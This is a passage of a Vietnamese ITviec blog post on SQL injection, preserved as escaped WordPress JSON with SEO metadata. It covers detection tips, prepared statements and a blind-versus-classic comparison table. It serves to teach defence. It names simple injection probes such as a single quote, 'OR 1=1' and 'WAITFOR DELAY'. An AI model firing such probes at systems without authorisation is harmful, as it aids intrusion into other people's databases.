thi\u1ebft. K\u1ebft h\u1ee3p qu\u00e9t t\u1ef1 \u0111\u1ed9ng trong c\u00e1c quy tr\u00ecnh CI\/CD (Continuous Integration\/Continuous Deployment) c\u0169ng l\u00e0 m\u1ed9t ph\u01b0\u01a1ng ph\u00e1p gi\u00fap duy tr\u00ec b\u1ea3o m\u1eadt li\u00ean t\u1ee5c.<\/span><\/li>\n<\/ul>\n<blockquote><p><b><i>L\u01b0u \u00fd r\u1eb1ng vi\u1ec7c k\u1ebft h\u1ee3p nhi\u1ec1u bi\u1ec7n ph\u00e1p b\u1ea3o m\u1eadt c\u00f9ng l\u00fac s\u1ebd gi\u00fap t\u0103ng c\u01b0\u1eddng an to\u00e0n v\u00e0 b\u1ea3o v\u1ec7 h\u1ec7 th\u1ed1ng hi\u1ec7u qu\u1ea3 h\u01a1n.<\/i><\/b><\/p><\/blockquote>\n<h2><span class=\"ez-toc-section\" id=\"Cau_hoi_thuong_gap_ve_SQL_Injection\"><\/span><b>C\u00e2u h\u1ecfi th\u01b0\u1eddng g\u1eb7p v\u1ec1 SQL Injection<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3><b>L\u00e0m th\u1ebf n\u00e0o \u0111\u1ec3 ph\u00e1t hi\u1ec7n m\u1ed9t \u1ee9ng d\u1ee5ng c\u00f3 d\u1ec5 b\u1ecb t\u1ea5n c\u00f4ng SQL Injection?<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">\u0110\u1ec3 ph\u00e1t hi\u1ec7n l\u1ed7 h\u1ed5ng SQL Injection trong \u1ee9ng d\u1ee5ng, b\u1ea1n c\u00f3 th\u1ec3:<\/span><\/p>\n<p><b>Ki\u1ec3m tra th\u1ee7 c\u00f4ng t\u1eeb giao di\u1ec7n ng\u01b0\u1eddi d\u00f9ng:<\/b><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Nh\u1eadp c\u00e1c k\u00fd t\u1ef1 \u0111\u1eb7c bi\u1ec7t nh\u01b0 d\u1ea5u nh\u00e1y \u0111\u01a1n (<\/span><span style=\"font-weight: 400;\">&#8216;<\/span><span style=\"font-weight: 400;\">) ho\u1eb7c t\u1eeb kh\u00f3a SQL nh\u01b0 <\/span><span style=\"font-weight: 400;\">OR 1=1<\/span><span style=\"font-weight: 400;\"> v\u00e0o c\u00e1c \u00f4 nh\u1eadp li\u1ec7u \u0111\u1ec3 ki\u1ec3m tra xem c\u00f3 xu\u1ea5t hi\u1ec7n l\u1ed7i b\u1ea5t th\u01b0\u1eddng kh\u00f4ng.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">S\u1eed d\u1ee5ng c\u00e1c \u0111i\u1ec1u ki\u1ec7n Boolean nh\u01b0 <\/span><span style=\"font-weight: 400;\">OR 1=1<\/span><span style=\"font-weight: 400;\"> v\u00e0 <\/span><span style=\"font-weight: 400;\">OR 1=2<\/span><span style=\"font-weight: 400;\"> \u0111\u1ec3 quan s\u00e1t s\u1ef1 thay \u0111\u1ed5i trong ph\u1ea3n h\u1ed3i c\u1ee7a \u1ee9ng d\u1ee5ng.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Th\u1ef1c hi\u1ec7n c\u00e1c t\u1ea5n c\u00f4ng d\u1ef1a tr\u00ean th\u1eddi gian, ch\u1eb3ng h\u1ea1n s\u1eed d\u1ee5ng payload nh\u01b0 <\/span><span style=\"font-weight: 400;\">WAITFOR DELAY &#8217;00:00:05&#8242;<\/span><span style=\"font-weight: 400;\"> \u0111\u1ec3 ki\u1ec3m tra xem \u1ee9ng d\u1ee5ng c\u00f3 ph\u1ea3n h\u1ed3i ch\u1eadm h\u01a1n kh\u00f4ng.<\/span><\/li>\n<\/ul>\n<p><b>Ki\u1ec3m tra n\u1ed9i dung logs c\u1ee7a m\u00e1y ch\u1ee7:<\/b><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Xem x\u00e9t c\u00e1c b\u1ea3n ghi nh\u1eadt k\u00fd (logs) tr\u00ean m\u00e1y ch\u1ee7 \u0111\u1ec3 ph\u00e1t hi\u1ec7n c\u00e1c truy v\u1ea5n SQL b\u1ea5t th\u01b0\u1eddng ho\u1eb7c c\u00f3 d\u1ea5u hi\u1ec7u b\u1ecb ch\u1ec9nh s\u1eeda b\u1edfi \u0111\u1ea7u v\u00e0o kh\u00f4ng an to\u00e0n.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">T\u00ecm ki\u1ebfm c\u00e1c th\u00f4ng b\u00e1o l\u1ed7i ho\u1eb7c truy v\u1ea5n ch\u1ee9a c\u00e1c t\u1eeb kh\u00f3a \u0111\u1eb7c tr\u01b0ng c\u1ee7a SQL Injection.<\/span><\/li>\n<\/ul>\n<p><b>S\u1eed d\u1ee5ng c\u00f4ng c\u1ee5 ki\u1ec3m tra t\u1ef1 \u0111\u1ed9ng:<\/b><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">S\u1eed d\u1ee5ng c\u00e1c c\u00f4ng c\u1ee5 chuy\u00ean d\u1ee5ng nh\u01b0 SQLMap, Burp Suite ho\u1eb7c OWASP ZAP \u0111\u1ec3 t\u1ef1 \u0111\u1ed9ng ph\u00e1t hi\u1ec7n v\u00e0 ki\u1ec3m tra l\u1ed7 h\u1ed5ng SQL Injection.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">C\u00e1c c\u00f4ng c\u1ee5 n\u00e0y c\u00f3 th\u1ec3 g\u1eedi h\u00e0ng lo\u1ea1t payload th\u1eed nghi\u1ec7m v\u00e0 ph\u00e2n t\u00edch ph\u1ea3n h\u1ed3i t\u1eeb \u1ee9ng d\u1ee5ng \u0111\u1ec3 x\u00e1c \u0111\u1ecbnh c\u00e1c l\u1ed7 h\u1ed5ng ti\u1ec1m t\u00e0ng.<\/span><\/li>\n<\/ul>\n<h3><b>C\u00e2u l\u1ec7nh \u0111\u00e3 chu\u1ea9n b\u1ecb (Prepared Statements) c\u00f3 an to\u00e0n kh\u1ecfi SQL injection kh\u00f4ng?<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">C\u00f3, c\u00e2u l\u1ec7nh \u0111\u00e3 chu\u1ea9n b\u1ecb (prepared statements) an to\u00e0n kh\u1ecfi SQL injection v\u00ec ch\u00fang t\u00e1ch bi\u1ec7t m\u00e3 SQL v\u00e0 d\u1eef li\u1ec7u \u0111\u1ea7u v\u00e0o c\u1ee7a ng\u01b0\u1eddi d\u00f9ng, \u0111\u1ea3m b\u1ea3o d\u1eef li\u1ec7u ng\u01b0\u1eddi d\u00f9ng ch\u1ec9 \u0111\u01b0\u1ee3c x\u1eed l\u00fd nh\u01b0 m\u1ed9t gi\u00e1 tr\u1ecb, kh\u00f4ng ph\u1ea3i m\u00e3 th\u1ef1c thi, gi\u00fap ng\u0103n ch\u1eb7n c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng SQL injection.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">T\u01b0\u01a1ng t\u1ef1, c\u00e1c th\u1ee7 t\u1ee5c l\u01b0u tr\u1eef an to\u00e0n (safe stored procedures) c\u0169ng cung c\u1ea5p s\u1ef1 b\u1ea3o v\u1ec7 b\u1eb1ng c\u00e1ch s\u1eed d\u1ee5ng \u0111\u1ea7u v\u00e0o tham s\u1ed1 h\u00f3a. C\u1ea3 hai ph\u01b0\u01a1ng ph\u00e1p \u0111\u1ec1u hi\u1ec7u qu\u1ea3 v\u00e0 vi\u1ec7c ch\u1ecdn ph\u01b0\u01a1ng ph\u00e1p n\u00e0o ph\u1ee5 thu\u1ed9c v\u00e0o nhu c\u1ea7u v\u00e0 \u1ee9ng d\u1ee5ng c\u1ee7a t\u1ed5 ch\u1ee9c b\u1ea1n.<\/span><\/p>\n<h3><b>Blind SQL Injection kh\u00e1c g\u00ec so v\u1edbi Classic SQL Injection?<\/b><\/h3>\n<table>\n<tbody>\n<tr>\n<td><b>Ti\u00eau ch\u00ed<\/b><\/td>\n<td><b>Blind SQL Injection<\/b><\/td>\n<td><b>Classic SQL Injection<\/b><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-weight: 400;\">Kh\u1ea3 n\u0103ng xem k\u1ebft qu\u1ea3 truy v\u1ea5n<\/span><\/td>\n<td style=\"text-align: left;\"><span style=\"font-weight: 400;\">Kh\u00f4ng th\u1ec3 xem tr\u1ef1c ti\u1ebfp k\u1ebft qu\u1ea3; ch\u1ec9 d\u1ef1a v\u00e0o ph\u1ea3n h\u1ed3i gi\u00e1n ti\u1ebfp t\u1eeb \u1ee9ng d\u1ee5ng \u0111\u1ec3 x\u00e1c \u0111\u1ecbnh th\u00f4ng tin.<\/span><\/td>\n<td style=\"text-align: left;\"><span style=\"font-weight: 400;\">C\u00f3 th\u1ec3 tr\u1ef1c ti\u1ebfp xem d\u1eef li\u1ec7u tr\u1ea3 v\u1ec1 t\u1eeb c\u01a1 s\u1edf d\u1eef li\u1ec7u.<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-weight: 400;\">Ph\u01b0\u01a1ng ph\u00e1p t\u1ea5n c\u00f4ng ch\u00ednh<\/span><\/td>\n<td>\n<p style=\"text-align: left;\"><span style=\"font-weight: 400;\">&#8211; Ki\u1ec3m tra \u0111i\u1ec1u ki\u1ec7n Boolean (True\/False).<\/span><\/p>\n<p style=\"text-align: left;\"><span style=\"font-weight: 400;\">&#8211; T\u1ea5n c\u00f4ng d\u1ef1a tr\u00ean \u0111\u1ed9 tr\u1ec5 th\u1eddi gian (Time-based SQLi).<\/span><\/p>\n<\/td>\n<td style=\"text-align: left;\"><span style=\"font-weight: 400;\">Th\u1ef1c hi\u1ec7n truy v\u1ea5n tr\u1ef1c ti\u1ebfp v\u00e0 ngay l\u1eadp t\u1ee9c nh\u1eadn \u0111\u01b0\u1ee3c d\u1eef li\u1ec7u.<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-weight: 400;\">\u0110\u1ed9 ph\u1ee9c t\u1ea1p<\/span><\/td>\n<td style=\"text-align: left;\"><span style=\"font-weight: 400;\">Ph\u1ee9c t\u1ea1p h\u01a1n, y\u00eau c\u1ea7u nhi\u1ec1u th\u1eed nghi\u1ec7m v\u00e0 ph\u00e2n t\u00edch ph\u1ea3n h\u1ed3i t\u1eeb \u1ee9ng d\u1ee5ng.<\/span><\/td>\n<td style=\"text-align: left;\"><span style=\"font-weight: 400;\">\u0110\u01a1n gi\u1ea3n h\u01a1n do truy v\u1ea5n tr\u1ef1c ti\u1ebfp tr\u1ea3 v\u1ec1 k\u1ebft qu\u1ea3 r\u00f5 r\u00e0ng.<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-weight: 400;\">M\u1ee5c ti\u00eau t\u1ea5n c\u00f4ng<\/span><\/td>\n<td style=\"text-align: left;\"><span style=\"font-weight: 400;\">Thu th\u1eadp th\u00f4ng tin t\u1eeb c\u01a1 s\u1edf d\u1eef li\u1ec7u m\u00e0 kh\u00f4ng \u0111\u1ec3 l\u1ed9 k\u1ebft qu\u1ea3 r\u00f5 r\u00e0ng ra b\u00ean ngo\u00e0i.<\/span><\/td>\n<td style=\"text-align: left;\"><span style=\"font-weight: 400;\">Chi\u1ebfm quy\u1ec1n truy c\u1eadp d\u1eef li\u1ec7u ho\u1eb7c ki\u1ec3m so\u00e1t tr\u1ef1c ti\u1ebfp c\u01a1 s\u1edf d\u1eef li\u1ec7u.<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2><span class=\"ez-toc-section\" id=\"Tong_ket\"><\/span><b>T\u1ed5ng k\u1ebft<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><span style=\"font-weight: 400;\">B\u1ea3o m\u1eadt kh\u00f4ng ph\u1ea3i l\u00e0 m\u1ed9t \u0111i\u1ec3m \u0111\u1ebfn, m\u00e0 l\u00e0 m\u1ed9t h\u00e0nh tr\u00ecnh. SQL Injection l\u00e0 m\u1ed9t m\u1ed1i \u0111e d\u1ecda nghi\u00eam tr\u1ecdng \u0111\u1ed1i v\u1edbi t\u1ea5t c\u1ea3 c\u00e1c \u1ee9ng d\u1ee5ng web c\u00f3 s\u1eed d\u1ee5ng c\u01a1 s\u1edf d\u1eef li\u1ec7u v\u00e0 l\u00e0 l\u1eddi nh\u1eafc nh\u1edf r\u1eb1ng b\u1ea5t k\u1ef3 h\u1ec7 th\u1ed1ng n\u00e0o c\u0169ng c\u1ea7n \u0111\u01b0\u1ee3c b\u1ea3o v\u1ec7 li\u00ean t\u1ee5c. Tuy nhi\u00ean v\u1edbi c\u00e1c c\u00f4ng c\u1ee5 v\u00e0 k\u1ef9 thu\u1eadt ph\u00f2ng ng\u1eeba \u0111\u00fang \u0111\u1eafn, b\u1ea1n ho\u00e0n to\u00e0n c\u00f3 th\u1ec3 y\u00ean t\u00e2m v\u1eadn h\u00e0nh h\u1ec7 th\u1ed1ng m\u00e0 kh\u00f4ng lo ng\u1ea1i v\u1ec1 r\u1ee7i ro n\u00e0y.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">ITviec hy v\u1ecdng b\u00e0i vi\u1ebft tr\u00ean \u0111\u00e3 cung c\u1ea5p cho b\u1ea1n c\u00e1i nh\u00ecn t\u1ed5ng quan h\u01a1n v\u1ec1 SQL injection v\u00e0 m\u1ed9t s\u1ed1 ph\u01b0\u01a1ng ph\u00e1p ph\u00f2ng ng\u1eeba h\u1eefu \u00edch.<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>SQL Injection l\u00e0 m\u1ed9t trong nh\u1eefng l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt nghi\u00eam tr\u1ecdng nh\u1ea5t, g\u00e2y thi\u1ec7t h\u1ea1i l\u1edbn cho c\u00e1c h\u1ec7 th\u1ed1ng web tr\u00ean to\u00e0n th\u1ebf gi\u1edbi. Hacker c\u00f3 th\u1ec3 khai th\u00e1c l\u1ed7 h\u1ed5ng n\u00e0y \u0111\u1ec3 truy c\u1eadp tr\u00e1i ph\u00e9p v\u00e0o d\u1eef li\u1ec7u ho\u1eb7c th\u1eadm ch\u00ed ki\u1ec3m so\u00e1t to\u00e0n b\u1ed9 c\u01a1 s\u1edf d\u1eef li\u1ec7u. \u0110\u1ecdc b\u00e0i [&hellip;]<\/p>\n","protected":false},"author":209,"featured_media":82229,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_gspb_post_css":"","footnotes":""},"categories":[109],"tags":[],"class_list":["post-82168","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-chuyen-mon-it"],"blocksy_meta":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v26.8 (Yoast SEO v27.8) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>SQL Injection: C\u00e1ch th\u1ee9c ho\u1ea1t \u0111\u1ed9ng v\u00e0 ph\u00f2ng ch\u1ed1ng SQLi - ITviec Blog<\/title>\n<meta name=\"description\" content=\"SQL Injection l\u00e0 m\u1ed9t trong nh\u1eefng l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt ph\u1ed5 bi\u1ebfn nh\u1ea5t. Kh\u00e1m ph\u00e1 c\u00e1ch ph\u00e1t hi\u1ec7n, ph\u00e2n lo\u1ea1i v\u00e0 b\u1ea3o v\u1ec7 h\u1ec7 th\u1ed1ng kh\u1ecfi SQL Injection.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/\" \/>\n<meta property=\"og:locale\" content=\"vi_VN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SQL Injection: C\u00e1ch th\u1ee9c ho\u1ea1t \u0111\u1ed9ng v\u00e0 ph\u00f2ng ch\u1ed1ng SQLi\" \/>\n<meta property=\"og:description\" content=\"SQL Injection l\u00e0 m\u1ed9t trong nh\u1eefng l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt nghi\u00eam tr\u1ecdng nh\u1ea5t, g\u00e2y thi\u1ec7t h\u1ea1i l\u1edbn cho c\u00e1c h\u1ec7 th\u1ed1ng web tr\u00ean to\u00e0n th\u1ebf gi\u1edbi. Hacker c\u00f3 th\u1ec3 khai th\u00e1c l\u1ed7\" \/>\n<meta property=\"og:url\" content=\"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/\" \/>\n<meta property=\"og:site_name\" content=\"ITviec Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/ITviec\" \/>\n<meta property=\"article:published_time\" content=\"2024-11-28T07:36:10+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/11\/SQL-Injection-vippro.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1500\" \/>\n\t<meta property=\"og:image:height\" content=\"790\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"M\u1ef9 Duy\u00ean\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@ITviec\" \/>\n<meta name=\"twitter:site\" content=\"@ITviec\" \/>\n<meta name=\"twitter:label1\" content=\"\u0110\u01b0\u1ee3c vi\u1ebft b\u1edfi\" \/>\n\t<meta name=\"twitter:data1\" content=\"M\u1ef9 Duy\u00ean\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc\" \/>\n\t<meta name=\"twitter:data2\" content=\"19 ph\u00fat\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"SQL Injection: C\u00e1ch th\u1ee9c ho\u1ea1t \u0111\u1ed9ng v\u00e0 ph\u00f2ng ch\u1ed1ng SQLi - ITviec Blog","description":"SQL Injection l\u00e0 m\u1ed9t trong nh\u1eefng l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt ph\u1ed5 bi\u1ebfn nh\u1ea5t. Kh\u00e1m ph\u00e1 c\u00e1ch ph\u00e1t hi\u1ec7n, ph\u00e2n lo\u1ea1i v\u00e0 b\u1ea3o v\u1ec7 h\u1ec7 th\u1ed1ng kh\u1ecfi SQL Injection.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/","og_locale":"vi_VN","og_type":"article","og_title":"SQL Injection: C\u00e1ch th\u1ee9c ho\u1ea1t \u0111\u1ed9ng v\u00e0 ph\u00f2ng ch\u1ed1ng SQLi","og_description":"SQL Injection l\u00e0 m\u1ed9t trong nh\u1eefng l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt nghi\u00eam tr\u1ecdng nh\u1ea5t, g\u00e2y thi\u1ec7t h\u1ea1i l\u1edbn cho c\u00e1c h\u1ec7 th\u1ed1ng web tr\u00ean to\u00e0n th\u1ebf gi\u1edbi. Hacker c\u00f3 th\u1ec3 khai th\u00e1c l\u1ed7","og_url":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/","og_site_name":"ITviec Blog","article_publisher":"https:\/\/www.facebook.com\/ITviec","article_published_time":"2024-11-28T07:36:10+00:00","og_image":[{"width":1500,"height":790,"url":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/11\/SQL-Injection-vippro.jpg","type":"image\/jpeg"}],"author":"M\u1ef9 Duy\u00ean","twitter_card":"summary_large_image","twitter_creator":"@ITviec","twitter_site":"@ITviec","twitter_misc":{"\u0110\u01b0\u1ee3c vi\u1ebft b\u1edfi":"M\u1ef9 Duy\u00ean","\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc":"19 ph\u00fat"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#article","isPartOf":{"@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/"},"author":{"name":"M\u1ef9 Duy\u00ean","@id":"https:\/\/itviec.com\/blog\/#\/schema\/person\/73733c0725c7e39e696a896bd1abe2d7"},"headline":"SQL Injection: C\u00e1ch th\u1ee9c ho\u1ea1t \u0111\u1ed9ng v\u00e0 ph\u00f2ng ch\u1ed1ng SQLi","datePublished":"2024-11-28T07:36:10+00:00","mainEntityOfPage":{"@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/"},"wordCount":5416,"publisher":{"@id":"https:\/\/itviec.com\/blog\/#organization"},"image":{"@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#primaryimage"},"thumbnailUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/11\/SQL-Injection-vippro.jpg","articleSection":["Chuy\u00ean m\u00f4n IT"],"inLanguage":"vi"},{"@type":"WebPage","@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/","url":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/","name":"SQL Injection: C\u00e1ch th\u1ee9c ho\u1ea1t \u0111\u1ed9ng v\u00e0 ph\u00f2ng ch\u1ed1ng SQLi - ITviec Blog","isPartOf":{"@id":"https:\/\/itviec.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#primaryimage"},"image":{"@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#primaryimage"},"thumbnailUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/11\/SQL-Injection-vippro.jpg","datePublished":"2024-11-28T07:36:10+00:00","description":"SQL Injection l\u00e0 m\u1ed9t trong nh\u1eefng l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt ph\u1ed5 bi\u1ebfn nh\u1ea5t. Kh\u00e1m ph\u00e1 c\u00e1ch ph\u00e1t hi\u1ec7n, ph\u00e2n lo\u1ea1i v\u00e0 b\u1ea3o v\u1ec7 h\u1ec7 th\u1ed1ng kh\u1ecfi SQL Injection.","breadcrumb":{"@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#breadcrumb"},"inLanguage":"vi","potentialAction":[{"@type":"ReadAction","target":["https:\/\/itviec.com\/blog\/sql-injection-la-gi\/"]}]},{"@type":"ImageObject","inLanguage":"vi","@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#primaryimage","url":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/11\/SQL-Injection-vippro.jpg","contentUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/11\/SQL-Injection-vippro.jpg","width":1500,"height":790,"caption":"SQL Injection l\u00e0 g\u00ec - itviec blog"},{"@type":"BreadcrumbList","@id":"https:\/\/itviec.com\/blog\/sql-injection-la-gi\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Chuy\u00ean m\u00f4n IT","item":"https:\/\/itviec.com\/blog\/chuyen-mon-it\/"},{"@type":"ListItem","position":2,"name":"SQL Injection: C\u00e1ch th\u1ee9c ho\u1ea1t \u0111\u1ed9ng v\u00e0 ph\u00f2ng ch\u1ed1ng SQLi"}]},{"@type":"WebSite","@id":"https:\/\/itviec.com\/blog\/#website","url":"https:\/\/itviec.com\/blog\/","name":"ITviec Blog","description":"IT Jobs &amp; People in Vietnam","publisher":{"@id":"https:\/\/itviec.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/itviec.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"vi"},{"@type":"Organization","@id":"https:\/\/itviec.com\/blog\/#organization","name":"ITviec","url":"https:\/\/itviec.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"vi","@id":"https:\/\/itviec.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2018\/12\/itviec-black-square-facebook.png","contentUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2018\/12\/itviec-black-square-facebook.png","width":1800,"height":1800,"caption":"ITviec"},"image":{"@id":"https:\/\/itviec.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/ITviec","https:\/\/x.com\/ITviec","https:\/\/www.linkedin.com\/company\/itviec","https:\/\/www.youtube.com\/channel\/UCYthAQ3bcGr57M_ag5gHDvQ"]},{"@type":"Person","@id":"https:\/\/itviec.com\/blog\/#\/schema\/person\/73733c0725c7e39e696a896bd1abe2d7","name":"M\u1ef9 Duy\u00ean","image":{"@type":"ImageObject","inLanguage":"vi","@id":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/03\/Author_Duyen-Tran-120x120.jpg","url":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/03\/Author_Duyen-Tran-120x120.jpg","contentUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/03\/Author_Duyen-Tran-120x120.jpg","caption":"M\u1ef9 Duy\u00ean"},"url":"https:\/\/itviec.com\/blog\/author\/my-duyen\/"}]}},"_links":{"self":[{"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/posts\/82168","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/users\/209"}],"replies":[{"embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/comments?post=82168"}],"version-history":[{"count":0,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/posts\/82168\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/media\/82229"}],"wp:attachment":[{"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/media?parent=82168"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/categories?post=82168"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/tags?post=82168"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}